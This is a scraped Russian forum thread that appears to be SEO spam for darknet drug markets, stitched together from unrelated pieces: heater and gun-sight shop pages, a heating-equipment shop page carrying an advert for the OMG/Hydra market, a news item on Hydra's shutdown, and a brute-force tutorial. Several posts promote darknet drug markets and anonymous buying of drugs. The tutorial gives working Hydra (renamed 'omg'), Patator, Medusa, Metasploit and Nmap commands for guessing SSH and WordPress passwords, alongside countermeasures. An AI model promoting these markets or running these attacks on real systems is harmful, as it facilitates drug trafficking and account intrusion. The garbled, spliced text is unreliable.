Матанга ссылка купли сол matangapchela com

Oqihi

Модератор
Подтвержденный
Сообщения
162
Реакции
41
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Pakojiv

Продвинутый юзер
Сообщения
91
Реакции
0
Матанга ссылка купли сол matangapchela com
ContactWarm flames breathe & glow with realistic logs & embers, bringing your fireplace to lifeManually controlled Vented log sets are perfect for chimneyed fireplacesVent-Free logs are a great option where you don't have a flu. Models include Thermostat, Remote, or Manual controlsRemote models have a unique self-charging feature that allows the матанга battery to be re-charged by the flameLearn More »Vent-Free heating provides supplemental heat to rooms allowing energy savingsNo vent pipes needed, keeping all the heat in the room and installation costs at a minimum.Oxygen Depletion Sensor (ODS) turns the heater off if the oxygen drops below a safe level.No Electricity needed. Great during power failuresLearn More »Torpedo Heaters are great for construction sites and outdoor tented areas that have good ventilation.High Quality Danfoss Gear pumpAutomatic ignitionOver Heat ProtectionElectronic Thermostat with Digital DisplayLearn More »Infared Radiant waves heat the object and not the air making it ideal for outdoor applications or construction areas with good ventilationPiezo IgnitionFar more portable than traditional patio heatersGreat for tailgatingLearn More »The Thermablaster Industrial Electric heaters are perfect for workshops with high ceilings and large floor space.Heat Output: 14000 BTU & 17000 BTUElectric blower heater for professional purposesDurable stainless steel heating elementThermostat controlLearn More »BLOG12.12.16THERMABLASTER Remote Log Sets with Dr. Frank on CBS TV PittsburghRead More04.28.16Thermablaster by Reecon will be attending the National Hardware Show in Las Vegas on May 4th through May 6th!Thermablaster by Reecon will be attending the National... Read More12.03.15Thermablaster Outdoor Infrared Heaters on GroupOn!https://www.groupon.com/deals/gg-thermablaster-outdoor-infrared-heaters Thermablaster Outdoor Infrared Heaters are now available... Read More
 

Bihumi

Юзер
Сообщения
70
Реакции
18
MyAccountView MyCartHomeShopAbout UsQ&ASupportContactUsDocumentsScopesMountsSightsReloadingAccessoriesActionPartsNavigationHomeShopAbout UsQ&ASupportContact UsDocumentsScopesMountsSightsReloadingAccessoriesActionPartsUnparalleled Quality About MVAVintage Sights, Scopes, Mountsand AccessoriesOur CatalogueSee for yourself why we're thebest in the businessTrophy RoomAmazing experiences using MVAproductsNEW PRODUCTSSelectoptionsHadleyEyediscs$74.00 –$113.00Select optionsMVA Combination Front Sight$89.00SelectoptionsInsert/ApertureCards$21.00Out ofstockReadmoreSightInsert Caddy$12.00SelectoptionsBlowTubesRated 5.00 out of 5$10.00Select options#113 Spirit Level Non-Windage Sight$167.00SelectoptionsCustomLeather Sacks$22.00SelectoptionsScrew-onBlock$15.00 –$30.00Add tocartSouleKnurled Knob$36.00SelectoptionsDovetailBlock$20.00Selectoptions#111Plain Globe Sight$96.00Selectoptions#101 MidRange$425.00Product TagsThe Retailer ConnectFacebookLinkedinTwitter Visit Gold BeeSee their CBD GummiesLovely CBD OilCheck out their CBD ProductsCopyright 2014 - MontanaVintage Arms, All Rights Reserved Terms ofService - PrivacyPolicyHomeShopAbout UsQ&ASupportContactUsDocumentsScopesMountsSightsReloadingAccessoriesActionPartsNavigationHomeShopAbout UsQ&ASupportContact UsDocumentsScopesMountsSightsReloadingAccessoriesActionPartsPoweredbyWordPressSupport
Матанга ссылка купли сол matangapchela com
 

Syzopy

Юзер
Сообщения
54
Реакции
1
Omg Market, или просто “ОМГ”, – нелегальная интернет-площадка, на которой действовали 19 тыс. продавцов наркотиками. В апреле 2022 года США совместно с Германией остановили деятельность этого ресурса. Что будет с ним дальше. Что такое “omg” и что произошло с этой нелегальной площадкой“ОМГ” – это очень крупный русскоязычный интернет-магазин, в котором продавали наркотики и персональную информацию. Власти Германии и США провели расследование и остановили работу площадки, сообщает интернет-портал tolknews.ru.omg Market, или просто “ОМГ”, – нелегальная интернет-площадка, на которой действовали 19 тыс. продавцов наркотиками, поддельными документами и нелегально добытой информацией. Только в 2020 году продажи “Гидры” составили не менее 1,23 млрд евро, приводит статистику “Коммерсант”. На торговой площадке было зарегистрировано порядка 17 млн клиентов.Крупнейшая в мире онлайн-площадка по продаже наркотиков «ОМГ» прекратила свою работу рано утром 5 апреля. Позднее Федеральное управление уголовной полиции Германии и Центральное управление по борьбе с киберпреступностью прокуратуры Франкфурта-на-Майне заявили об изъятии находящейся в Германии серверной инфраструктуры «Гидры» и конфискации 23 миллионов евро в биткоинах. Возможно, 2022-й станет годом окончательного закрытия “Гидры”.Прокуратура Франкфурта-на-Майне и Федеральное ведомство уголовной полиции Германии после “масштабных расследований” при участии властей США выключили серверы “Гидры” в Германии и изъяли крупную сумму денег в биткоинах.А США ввели санкции против “Гидры”. Все имущество физических лиц и организаций, имеющих отношение к “Гидре”, которое находится в Штатах, будет заблокировано.Что будет с «Гидрой» дальше?  Сотрудник «Гидры» заявил, что магазины ищут другие площадки после отключения серверов – пишет интернет-портал lenta.ru.Работа всех магазинов на «Гидре», крупнейшем в мире нелегальном онлайн-маркетплейсе по продаже наркотиков, поставлена на паузу после того, как немецкие силовики отключили его серверы. Об этом в беседе с «Лентой.ру» на условиях анонимности заявил оператор одного из таких магазинов. Он также раскрыл дальнейшие планы продавцов запрещенных веществ.«Все сотрудники нашего магазина получили от нас указания не предпринимать никаких действий. В районе обеда нам дали понять, что ничего критичного не произошло, так как у площадки много серверов. Связь с сотрудниками мы держим в альтернативных мессенджерах с высоким уровнем анонимности. Через саму “Гидру” ключевые рабочие вопросы никогда и не решались», — прокомментировал собеседник «Ленты.ру» информацию о закрытии магазина. Он добавил, что руководители магазинов «Гидры» начинают поиск альтернативных способов продажи запрещенных веществ.Сотрудник магазина подчеркнул, что большинство пользователей площадки не верят в то, что у «Гидры» нет резервных серверов. По их мнению, длительное отключение маркетплейса связано с тем, что сотрудники «Гидры» пытаются оценить нанесенный немецкими полицейскими ущерб.Кто владелец «Гидры» в Санкт-ПетербургеМинистерство юстиции США 5 апреля опубликовало результаты расследования о работе даркнет-гипермаркета omg, где торговали наркотиками, оружием и поддельными документами, отмывали деньги и далее по темному списку. За оборотами в миллиарды долларов американцы увидели 30-летнего россиянина Дмитрия Павлова – рассказывает портал 9111.ru.“По предварительным данным, с ноября 2015 года Павлов управлял компанией ООО “Промсервис”, также известной как хостинговая компания “Полный привод”, “Все колеса” и 4x4host.ru, которая администрировала серверы “Гидры”. “Павлов, предположительно, вступил в сговор с другими операторами omg, чтобы заниматься развитием сайта, предоставив важную инфраструктуру, которая позволила omg работать и процветать в конкурентной среде даркнета, – говорится в сообщении заокеанского Минюста. Там же аккуратно добавляют. – При этом Павлов, возможно, получал комиссионные на миллионы долларов от незаконных продаж, проводимых через сайт”.47news нашел ООО “Промсервис”. Фирма зарегистрирована в сентябре 2003 года на улице Маяковского в Череповце с профилем деятельности “турбизнес”. По данным СПАРК-Интерфакс, на нее оформлены 11 доменных имен. Например, paycache.ru, geepay.ru и 4x4host.ru. Последний создан в июне 2009 года. Указанный как контактный номер телефона “Промсервиса” на момент подготовки публикации не отвечал.Какого дохода лишилась “omg” за время простояАвторитетный Telegram-канал DrugStat, занимающийся в том числе аналитикой экономических показателей российского онлайн-рынка оборота наркотиков, подтвердил информацию о выводе основной части средств с кошельков, связанных с «Гидрой»: «Очень важно, что мы подтверждаем только этот факт. Мы не подтверждаем другую информацию. Потому что даже в пресс-релизе немецких силовиков есть ошибки» – пишет портал 9111.ru.По данным криптовалютной площадки Blockchain.com, на один из кошельков ранним утром 5 апреля почти сотней отдельных транзакций были выведены более 543 биткоинов (примерно 2,12 миллиарда рублей, те самые 23 миллиона евро) с адресов, начинающихся с цифры 3, — именно так выглядят кошельки пользователей «Гидры» (не только они, но они в том числе). При этом DrugStat не подтвердил ни информацию о том, что за выводом стояли немецкие полицейские, ни сведения об аресте владельцев «Гидры». Вечером 5 апреля были проведены еще несколько транзакций на этот кошелек Источник Подробнее ➤
 

Febomyqi

Юзер
Сообщения
106
Реакции
16
ContactWarm flames breathe & glow with realistic logs & embers, bringing your fireplace to lifeManually controlled Vented log sets are perfect for chimneyed fireplacesVent-Free logs are a great option where you don't have a flu. Models include Thermostat, Remote, or Manual controlsRemote models have a unique self-charging feature that allows the battery to be re-charged by the flameLearn More »Vent-Free heating provides supplemental heat to rooms allowing energy savingsNo vent pipes needed, keeping all the heat in the room and installation costs at a minimum.Oxygen Depletion Sensor (ODS) turns the heater off if the oxygen drops below a safe level.No Electricity needed. Great during power failuresLearn More »Torpedo Heaters are great for construction sites and outdoor tented areas that have good ventilation.High Quality Danfoss Gear pumpAutomatic ignitionOver Heat ProtectionElectronic Thermostat with Digital DisplayLearn More »Infared Radiant waves heat the object and not the air making it ideal for outdoor applications or construction areas with good ventilationPiezo IgnitionFar more portable than traditional patio heatersGreat for tailgatingLearn More »The Thermablaster Industrial Electric heaters are perfect for workshops with high ceilings and large floor space.Heat Output: 14000 BTU & 17000 BTUElectric blower heater for professional purposesDurable stainless steel heating elementThermostat controlLearn More »BLOG12.12.16THERMABLASTER Remote Log Sets with Dr. Frank on CBS TV PittsburghRead More04.28.16Thermablaster by Reecon will be attending the National Hardware Show in Las Vegas on May 4th through May 6th!Thermablaster by Reecon will be attending the National... Read More12.03.15Thermablaster Outdoor Infrared Heaters on GroupOn!https://www.groupon.com/deals/gg-thermablaster-outdoor-infrared-heaters Thermablaster Outdoor Infrared Heaters are now available... Read More
 
I

Iqiwoz

Юзер
Сообщения
31
Реакции
4
МенюГлавнаяКак сделатьзаказДоставкаОплатаОкомпанииСтатьиПартнеры по монтажуСвязаться снамиДоставка по Перми, краю и всей РФОтдел продаж: 8 (342) 254-05-25 Логистика ибухгалтерия: 8 (342)254-05-67
Режим работыПН-ПТ 9:00 - 18:30СБ ВыходнойВС ВыходнойПерезвонитемне!Товаров: 0(0.00 руб.)В корзине пусто! КатегорииСпециальноепредложение месяцаКотлыКотлыГазовыенастенные котлы- Газовые котлыChaffoteaux- Газовые настенные котлыBOSCH- Настенные котлыBUDERUSНапольные газовыечугунные отопительные котлыНастенныеконденсационные котлы- Конденсационные котлыBUDERUS- Настенные конденсационныегазовые котлы BOSCHЭлектрическиекотлы- Электрические котлыPROTHERMГазовые напольныекотлыДымоходыТвердотопливныекотлыНасосыНасосыВибрационные насосыНасосы KSB- Насосы Amarex- Насосы ETA- Насосы SewablocДренажныенасосыКанализационныенасосные станцииКомплектующиедля насосов- Блоки автоматики и реле давления- Манометры- Присоединительная арматураНасосы-автоматыПоверхностныенасосыСкважинныенасосыФонтанныенасосыЦиркуляционныенасосыРадиаторыРадиаторыСтальныепанельные радиаторы- Стальные панельные радиаторы Viessmann Vitoset- Стальные панельные радиаторы Buderus- Комплектующие Viessmann- Комплектующие BuderusСтальныетрубчатые радиаторы- Боковое подключение- Нижнее подключениеТрубы и фитингиТрубы ифитингиМеталлопластиковые трубы и фитинги FRANKISCHE (Германия)- Металлопластиковые трубы FRANKISCHE- Фитинги для металлопластиковых трубИнструмент для монтажа трубопроводов- Инструмент UponorПНД(полиэтилен низкого давления)Теплоизолированныетрубы Uponor Ecoflex- Теплоизолированные трубы для теплого и холодноговодоснабжения- Теплоизолированные трубы для холодного водоснабжения инапорной канализацииТрубыиз сшитого полиэтилена Uponor- Трубы Uponor Comfort Pipe Plus отопление и водоснабжение 6bar (малоэтажное строительство)- Трубы Uponor Minitec Comfort Pipe 9.9mm 6bar- Трубы Uponor Radi Pipe отопление и водоснабжение 10 bar(универсальная)- Фитинги для труб из сшитого полиэтиленаФитинги- Резьбовыефитинги GFБойлеры косвенного нагреваБойлеры косвенногонагреваБойлеры DRAZICEБойлеры FLAMCOБойлеры VIESSMANNСчетчикиводыМембранные бакиМембранныебакиБаки для воды Flamco (AirFix)Баки для отопления Flamco (FlexCon)Расширительные баки Flexcon PremiumАксессуарыГидроаккумуляторыBELAMOSРасширительныебаки Flexcon SolarТеплоноситель для систем отопленияТеплоносительдля систем отопленияAntifrogen N температура замерзания от -10 до -70Балансировочная арматура NexusValveБалансировочная арматураNexusValveРучнойстатический балансировочный клапанКлапан регуляторперепада давленияКомбинированныйклапанРучнойфланцевый статический балансировочный клапанАксессуарыЗапорно-регулирующая арматураЗапорно-регулирующаяарматураВоздухоотводчики FLAMKO FlexventГруппа безопасности для расширительного бака DIALГруппы безопасности котла DIALКраны шаровые- Краны шаровые GF- Краны шаровые ДИСТОбратные клапаны ITAPПредохранительные клапаны FLAMKO PrescorФильтры сетчатые ITAPПластиковые баки для воды и других жидкостейПластиковые баки для воды и других жидкостейВертикальные цилиндрическиеГоризонтальные цилиндрическиеЕмкости ДекоративныеПрямоугольныеТеплыеполыГлавная »Статьи » Сайт ОМГ — надежный магазин анонимныхпокупок в РоссииСайт ОМГ — надежный магазин анонимныхпокупок в РоссииОМГ как самый крупнейший интернет-магазин сторонних средств отсторонних инвесторов
Ты зашел на сайт Гидры. Здесь мы расскажем, что есть на Гидре,почему она считается лучшей площадкой по покупке запрещенныхтоваров и услуг.О ГидреМагазин ОМГ является из самой популярной площадкой в даркнетесреди всего СНГ, практически с самого начала своей деятельностиявляется самым крупным и популярным черным магазином.
На omg вы можете купить абсолютно любой запрещенный товар,который только пожелаете.Можно с уверенностью сказать что omg это нарко сайт, так какпреимущественно на сайте омг продаются различные марки, мдма,грибы, шишки, соли и много все прочего. Мы собрали для вас всерабочие ссылки гидры и способы безопасного посещения, а такжеанонимных и безопасных покупок на сайте ОМГ.TOR ссылка на Гидру onion — для анонимного посещенияРабочая ссылка гидры для TOR: omgonion
Зеркало гидры для TOR: omgmirrorПерейти по этим ссылкам можно только через браузер TOR.
Это анонимная ссылка, переходя по ней вы в полной безопасности.Никто не увидит, что вы заходили и покупали товар на Гидре.Ссылка на официальную Гидру для обычных браузеровЭта ссылка предназначена тем кому некогда устанавливать ТОР. Онане так безопасна, но вы сможете быстро зайти и купить нужныйтовар.Ссылка на Гидру: Официальныйсайт ГидрыТакже мы ведем мониторинг всех рабочих зеркал Гидры для васПодробнеездесьКак анонимно зайти на Гидру через телефонВы также можете установить TOR браузер себе на смартфон, чтобыиметь быстрый и безопасный доступ к магазину ОМГ
Использование Тор браузера на андроиде более безопасное из-завозможности установить пароль, на случай если злоумышленики получатфизический доступ к телефону.
Но также вы сможете установить Тор на iphone через appstore.
На нашем сайте есть детальное руководство о том как установить изайти на омг маркет через телефон. Подробнее тутОМГ официальнаяКак попасть на официальную гидру и не попасть на различные фейкик мошенникам. Это вечная наша проблема, их очень много, мы неуспеваем с ними бороться. Чтобы не попасть на уловки мошенников иих фейков, вам нужно знать наш Официальныйсайт, а также по этой ссылке вы сможете узнать о всехсуществующих официальных зеркалах omg, через ТОР и обычныебраузеры
Мы ведем для вас круглосуточный мониторинг зеркал гидры, мырекомендуем вас установить ТОР браузер на ваш компьютер дляудобства и безопасного перехода по официальным зекркалам, зачастуюбольшинство наших зеркал базируются именно в ТОР браузере, так какэто один из самых безопасных и анонимных способов совершать такогорода покупки, таким образом мы заботимся о своих посетителях.
Всегда перепроверяйте что вы находитесеь на официальномсайте Гидры.Итог о ГидреЭто был краткий экскурс по рабочим ссылкам и зеркалам Гидры, отом как безопасно заходить и совершать покупки, как зайти на Гидручерез телефон с помощью ТОР браузера.ОМГ — это самая крупная торговая площадка для анонимныхпокупкок различных наркотических веществ и не только.Лучшее качество и цена товара. Благодаря тому, что на ОМГпользуется огромной популярностью на черном рынке, у нас многопродавцов по всей России, самые низкие цены, из-за конкуренциимежду продавцами. Также каждый продавец хочет получить как можнобольше покупателей, поэтому качество товаров только растет.← Радиаторный терморегулятор DANFOSS RA 2994 |  ИнформацияКак сделатьзаказПартнеры помонтажуДоставка имонтажОплатаОкомпанииУсловия соглашенияПолитика конфиденциальностиСлужба поддержкиСвязатьсяс намиВозврат товараКартасайтаНаши контактыг. Пермь, ул. Бульвар Гагарина, 113Б
8 (342)254-05-25
[email protected]Мы в социальных сетях:Широкий выбор оборудования в наличии в Перми© 2014 – 2022 «Море тепла» ПермьОбратный звонокВаше имя Телефон Ясогласен(а) на обработку моих персональных данныхПерезвоните мнеПродолжить покупки
 

Vevimeg

Юзер
Сообщения
96
Реакции
23
Brute-force (атака полным перебором) – метод решения математических задач, сложность которого зависит от количества всех возможных решений. Сам же термин brute-force обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису.Рассмотрим инструменты, которые можно использовать для выполнения brute-force атак на SSH и WEB-сервисы, доступные в Kali Linux (Patator, Medusa, omg, Metasploit), а также BurpSuite.

Все материалы, предоставленные в рамках данной статьи, предназначены для использования исключительно в учебных целях. Использование материалов в противоправных и противозаконных запрещено.

Brute-force SSH
Для примера возьмем тестовую машину 192.168.60.50 и попробуем подобрать пароль пользователя test по SSH. Мы будем использовать популярные пароли из стандартного словаря rockyou.txt.
Patator
Для подбора пароля средствами Patator используем команду:patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg=’Authentication failed’где:
ssh_login — необходимый модуль
host – наша цель
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора
password – словарь с паролями
-x ignore:mesg=’Authentication failed’ — команда не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.
omg
Для подбора пароля используя omg выполним команду:omg -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50где:
-V – показывать пару логин+пароль во время перебора
-f – остановка как только будет найден пароль для указанного логина
-P – путь до словаря с паролями
ssh://192.168.60.50 – указание сервиса и IP-адрес жертвы
Medusa
Для подбора пароля с использованием Medusa выполним команду:medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6где:
-h – IP-адрес жертвы
-u – логин
-P – путь к словарю
-M – выбор модуля
-f – остановка после нахождения валидной пары логин/пароль
-v – настройка отображения сообщений на экране во время процесса подбора
Metasploit
Произведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_login и получили ответ:Задействуем модуль:use auxiliary/scanner/ssh/ssh_loginДля просмотра необходимых параметров, воспользуемся командой show options. Для нас это:
rhosts – IP-адрес жертвы
rport – порт
username – логин SSH
userpass_file – путь до словаря
stop_on_success – остановка, как только найдется пара логин/пароль
threads – количество потоковУказание необходимых параметров производится через команду "set".set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22Указав необходимые параметры набираем команду "run" и ждем.Противодействие
Ограничить количество устанавливаемых соединений с использованием межсетевого экрана. Пример настройки iptables:-A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset.Такое правило установит ограничение доступа к SSH для каждого IP-адреса до 1 соединения в секунду, значительно усложнив перебор. Также эффективным решением может быть использование двухфакторной аутентификации (например, используя eToken) или аутентификации с использованием ключевой пары, а также использование ACL на основе IP-адресов.Brute-force WordPress
Рассмотрим другой пример — подбор пароля окна авторизации веб-формы.Для примера будем подбирать пароль от учетной записи администратора wordpress.
BurpSuite
Для начала нам необходимо понять, как происходит процесс авторизации. Для этого мы будем использовать BurpSuite. Нам необходимо попробовать авторизоваться с любым паролем и логином, чтобы посмотреть какие запросы проходят через BurpSuite.Отлично, мы увидели POST запрос для авторизации с ним мы и будем работать.
В BODY указано какой логин и пароль проверялись, а значит, мы можем попробовать самостоятельно подставить нужные нам значения.
Передаем этот запрос в Intruder и там выбираем необходимые параметры для атаки. В пункте Payload Positions тип атаки оставляем sniper, но для проверки оставляем только параметр pwd. Таким образом, при атаке будет изменяться только этот параметр.Загружаем необходимый словарь и начинаем атаку.Из поведения веб-приложения мы видим, что неверный пароль возвращает код ответа 200. После перебора словаря, видим, что один из паролей дал ответ с кодом 302 — он и является верным.Данный метод перебора занимает намного больше времени, чем при использовании Patator, omg, Medusa и т.д. Даже с учетом того, что мы взяли небольшой словарь, BurpSuite перебирал словарь около 40 минут.
omg
Попробуем подобрать пароль с помощью omg.
Как мы уже знаем, при неверной авторизации возвращается код 200, а при успешной – 302. Попробуем использовать эту информацию.
Для запуска используем команду:omg -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"Здесь мы указываем обязательные параметры:
-l – имя пользователя
-P – словарь с паролями
-t – количество потоков
http-post-form – тип формы, у нас POST.
/wp-login.php – это URL страницы с авторизацией
^USER^ — показывает куда подставлять имя пользователя
^PASS^ — показывает куда подставлять пароль из словаря
S=302 – указание на какой ответ опираться omg. В нашем случае, ответ 302 при успешной авторизации.
Patator
Как мы уже знаем, при неудачной авторизации возвращается код 200, а при удачной – 302. Будем использовать тот же принцип, что и с omg:
Запуск производится командой:patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body='log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1' 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1http_fuzz – модуль для brute-force атаки http
url – адрес страницы с авторизацией
FILE0 — путь до словаря с паролями
body – информация, которая передается в POST запросе при авторизации
-t — количество потоков
-x – В данном случае мы указали команду не выводить на экран сообщения строки, содержащие параметр с кодом 200
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос
Как итог – нам удалось подобрать пароль.
Nmap
Утилита Nmap позволяет в том числе производить подбор паролей для веб-форм авторизации, если использовать скрипт http-wordpress-brute с соответствующими аргументами:
--script-args – добавление аргументов
user или userdb – логин или файла с логинами
pass или passdb — указание пароля или словаря
thread – количество потоков
firstonly=true – выводить результат после первого же правильного пароляnmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'Противодействие
Ограничить (усложнить) brute-force атаки на web-приложения можно средствами iptables (по аналогии с SSH) и средствами nginx. Для этого необходимо создать зону лимитов:
...
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
...

и задействовать ее:
location / {
...
limit_req zone=req_limits burst=10;
limit_req_status 429;
...
}

Такие настройки позволят ограничить количество запросов с одного IP-адреса до 40 в секунду.Усложнить задачу перебора можно используя следующие методы:
— Применение межсетевого экрана и прочего ПО для ограничения количества обращений к защищаемому сервису. О том, как мы используем машинное обучение для выявления подобных атак (в том числе распределенных), можно почитать в статье.
— Использование средств, препятствующих быстрой проверке корректности ключа (например, Captcha).Заключение
В данной статье мы поверхностно рассмотрели некоторые популярные инструменты. Сократить риск подбора пароля можно, следуя следующим рекомендациям:
— используйте устойчивые к подбору пароли;
— не создавайте пароли, используя личную информацию, например: дату рождения или имя + дата рождения или мобильный телефон;
— регулярно меняйте пароль;
— на всех аккаунтах применяйте уникальные пароли.Подобные рекомендации (как и рекомендации по безопасной веб-разработке) мало кто соблюдает, поэтому необходимо использовать различные программные решения, позволяющие:
— ограничить подключение по IP-адресу, или, если это невозможно, ограничить одновременное количество соединений с сервисом (средствами iptables, nginx и прочими);
— использовать двухфакторную аутентификацию;
— выявлять и блокировать подобные атаки средствами SIEM, WAF или другими (например, fail2ban).
 

Похожие темы

Сверху Снизу